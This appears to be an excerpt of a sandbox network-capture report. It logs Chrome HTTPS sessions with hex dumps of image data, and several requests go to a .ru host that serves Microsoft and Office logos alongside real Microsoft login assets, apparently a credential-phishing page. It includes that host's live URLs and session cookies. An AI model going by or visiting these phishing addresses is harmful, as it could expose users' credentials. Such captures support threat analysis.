                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1684INData Raw: c9 8d 26 3e e3 be 15 78 0b f1 fe 57 e6 82 bf 99 c0 d5 c0 5f 88 ae 52 77 e6 a6 a3 86 da 80 b8 66 de 4a 74 92 28 f3 f7 c2 99 c0 55 44 c1 f2 19 c0 7d b9 e9 a8 a1 96 03 76 62 ee 7b cd 3a a9 d9 0c ef 01 a2 33 cd 9f 89 02 94 59 a9 d9 48 ad 5b 89 b8 07 50 e6 cf 72 ed b8 92 58 b3 51 1f b8 30 d9 ba cf 02 df c9 4e a2 c1 8e 00 be 91 9d 84 1a 63 04 f1 66 f4 fa ec 44 1a ea 69 e2 86 95 5f 62 25 b5 63 04 d1 f2 75 23 60 e3 79 62 43 ca d7 06 16 e2 86 c3 c3 c0 bd 44 b1 c6 18 e0 16 e0 36 e2 9c 52 49 cf b7 08 b0 19 f1 19 61 eb a1 9f 6f 30 f4 fb 65 f1 18 70 2b 71 0c e4 d5 c4 cd f9 7e b6 f2 95 24 d5 cf 32 c4 bd 89 6d 89 c2 c6 ad c8 3d cb 7e 12 d1 4d ea 72 a2 43 dc 15 44 e7 62 a9 2c 46 13 9f 13 b7 63 6e b1 ff ba 89 f9 4c 25 be e7 5d 4e 74 9a bd 1c 8f 0a 53 f9 cc 39 7a 6a ce 7b
                                                                                                                                                                                                                                                                                                              Data Ascii: &>xW_RwfJt(UD}vb{:3YH[PrXQ0NcfDi_b%cu#`ybCD6RIao0ep+q~$2m=~MrCDb,FcnL%]NtS9zj{
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1685INData Raw: 23 95 c7 62 c0 05 e4 5f 64 4d 8a bb 81 95 5a 99 1c 35 d2 ce 44 b7 96 ec e7 69 53 62 36 70 40 4b 33 23 49 92 24 49 92 24 49 92 54 3d 2f 23 36 b3 66 af c9 14 15 03 c0 5a 85 8e 90 54 32 4b 02 97 90 7f b1 35 29 2e 05 16 6d 61 6e d4 2c 1b 02 cf 92 ff fc 6c 4a 0c 60 85 a6 24 49 92 24 49 92 24 49 aa b7 ef 93 bf 26 53 64 dc 54 ec f0 48 e5 b4 14 f0 0f f2 2f b8 26 c5 ff 01 23 5a 98 1b 35 c3 2a 44 77 96 ec e7 65 53 62 36 70 68 4b 33 23 49 92 24 49 92 24 49 92 54 4d 2b 03 13 c9 5f 97 29 32 be 51 e8 08 49 25 b6 24 70 21 f9 17 5d 93 e2 07 2d cd 8c ea 6e 79 e0 3a f2 9f 8f 4d 89 01 e0 23 2d cd 8c 24 49 92 24 49 92 24 49 52 75 fd 80 fc 75 99 a2 63 bb 42 47 48 6d b3 43 41 7f 2d 01 9c 09 bc 25 3b 91 06 f9 36 70 78 76 12 4a b3 2c 70 11 b0 65 76 22 0d 31 1b 38 08 f8 75 76 22
                                                                                                                                                                                                                                                                                                              Data Ascii: #b_dMZ5DiSb6p@K3#I$I$IT=/#6fZT2K5).man,lJ`$I$I$I&SdTH/&#Z5*DweSb6phK3#I$I$ITM+_)2QI%$p!]-ny:M#-$I$I$IRuucBGHmCA-%;6pxvJ,pev"18uv"
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1687INData Raw: f9 f3 da d4 f8 5f 60 d4 30 f3 24 49 92 24 49 92 24 49 92 9a ed cf e4 af 69 18 dd c5 78 62 6d 4e 52 0f 2c 0b fc 85 fc 0b bd c9 71 0f 71 ac cd a2 c3 cc 95 e6 b7 1a f0 2d 60 02 f9 f3 d8 d4 98 0e 1c 34 dc 44 49 92 24 49 92 24 49 92 a4 c6 f3 e8 94 7a c4 d1 2f 9c 58 49 c5 1a 05 7c 87 fc 8b bd e9 f1 30 f0 49 60 a9 85 4f 97 80 b5 81 1f 02 53 c8 9f b7 26 c7 53 c0 f6 c3 cc 95 24 49 92 24 49 92 24 49 d2 ea c0 58 f2 d7 36 8c ee e2 51 60 19 24 f5 c5 3e c0 24 f2 2f fc a6 c7 78 e0 44 e0 b5 0b 9f ae c6 19 09 ec 0c 9c 06 cc 24 7f 9e 9a 1e 37 00 eb 2e 74 c6 24 49 92 24 49 92 24 49 92 c2 9f c8 5f db 30 ba 8f 7d 5f 38 b1 92 7a 6b 43 e0 76 f2 2f 7e 23 e2 3a e0 10 60 e9 85 4d 5a cd ad 01 1c 0e 3c 40 fe 7c 18 11 27 03 4b 2c 64 ce 24 49 92 24 49 92 24 49 92 e6 d8 9f fc b5 0d a3
                                                                                                                                                                                                                                                                                                              Data Ascii: _`0$I$I$IixbmNR,qq-`4DI$I$Iz/XI|0I`OS&S$I$I$IX6Q`$>$/xD$7.t$I$I$I_0}_8zkCv/~#:`MZ<@|'K,d$I$I$I
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1688INData Raw: 06 b6 42 92 24 49 92 24 49 92 24 a9 5a 46 01 1f c3 75 c1 5e c7 00 f0 3d e2 08 1b 49 ea c8 8a c0 b1 c0 74 f2 5f d4 0c a3 8c f1 08 70 08 1e 97 22 49 92 24 49 92 24 49 92 aa 6d 45 e0 78 a2 e3 78 f6 fa 4b dd e2 09 e0 1d ad 4f 85 24 2d dc 46 c0 79 e4 bf b8 19 46 59 62 22 70 04 b0 04 92 24 49 92 24 49 92 24 49 f5 b1 2d 70 2d f9 6b 31 75 88 19 44 d7 8d e5 da 9a 01 49 6a d1 4e c4 b9 4c d9 2f 76 86 91 15 b3 81 93 81 97 20 49 92 24 49 92 24 49 92 54 5f 3b 03 37 92 bf 36 53 d5 b8 08 d8 b8 ed 51 97 a4 36 8d 02 3e 0c 3c 4c fe 0b 9f 61 f4 33 ce 05 36 43 92 24 49 92 24 49 92 24 a9 19 46 02 fb 03 77 93 bf 4e 53 95 b8 03 d8 b5 93 c1 96 a4 6e 2c 0e 7c 06 78 8a fc 17 42 c3 e8 65 5c 0a 6c 87 24 49 92 24 49 92 24 49 52 33 8d 06 de 0f 5c 46 fe ba 4d 59 e3 7a 60 4f 62 33 bc 24
                                                                                                                                                                                                                                                                                                              Data Ascii: B$I$I$ZFu^=It_p"I$I$ImExxKO$-FyFYb"p$I$I$I-p-k1uDIjNL/v I$I$IT_;76SQ6><La36C$I$I$FwNSn,|xBe\l$I$I$IR3\FMYz`Ob3$
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1689INData Raw: 92 24 49 92 24 49 92 f4 02 ff 1f be 6e 82 78 b2 5b dc 69 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                              Data Ascii: $I$Inx[iIENDB`


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              145192.168.2.1649862104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1689OUTGET /web5/assets/godaddy-microsoftlogo.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              146192.168.2.1649863104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1691OUTGET /web5/assets/officelogo.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              147192.168.2.1649859152.199.4.44443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1692OUTGET /shared/1.0/content/images/close_790189870c9543725dc3f5a15fb25e46.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1700INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Age: 13002576
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-MD5: rp+/fadJKxLUo+jgFmYTeQ==
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:18 GMT
                                                                                                                                                                                                                                                                                                              Etag: 0x8DB5C3F4721247A
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:44 GMT
                                                                                                                                                                                                                                                                                                              Server: ECAcc (dcb/7E86)
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-request-id: fb92ba1f-001e-002c-5d1e-916c57000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              Content-Length: 270
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1701INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69 6c 6c 3d 22 23
                                                                                                                                                                                                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              148192.168.2.1649861152.199.4.44443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1693OUTGET /shared/1.0/content/images/picker_verify_call_c2616792e1950f83fdef6e72dab97293.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Age: 13175540
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-MD5: XHrPYKKsqlxUvysuxtSE2A==
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:18 GMT
                                                                                                                                                                                                                                                                                                              Etag: 0x8DB5C3F4A98E9BB
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:50 GMT
                                                                                                                                                                                                                                                                                                              Server: ECAcc (dcb/7351)
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 67c07018-f01e-009e-268b-8f5806000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              Content-Length: 2905
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1733INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35 34 71 2e 34 38
                                                                                                                                                                                                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.48


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              149192.168.2.1649860152.199.4.44443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1693OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1735INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Age: 12693053
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-MD5: nTculR1Fom7eLci0F6rk+A==
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:18 GMT
                                                                                                                                                                                                                                                                                                              Etag: 0x8DB5C3F4ADC079A
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                                                                                                                                                                                                                                                              Server: ECAcc (dcb/7F50)
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-request-id: ea0142d8-d01e-008a-7fef-930c82000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              Content-Length: 7390
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1736INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31 30 2e 33 33 35 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              1563.140.38.180443192.168.2.1649749C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC268INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              vary: Origin
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:19 GMT
                                                                                                                                                                                                                                                                                                              content-type: text/plain;charset=utf-8
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:19 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:19 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              location: https://sstats.adobe.com/b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52294029732250?AQB=1&pccr=true&vidn=329CA0F3A19B75CA-60000BAF437DAE53&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A18%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1
                                                                                                                                                                                                                                                                                                              content-length: 0
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              150192.168.2.164985813.107.226.40443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1693OUTGET /shared/1.0/content/images/picker_verify_email_958962caa7cf6b75cd412e9e3b687b22.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: logincdn.msauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:18 UTC1699INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-Length: 212
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                              Content-MD5: pFQUXilUkzYtIbvSwGgVBQ==
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:22:52 GMT
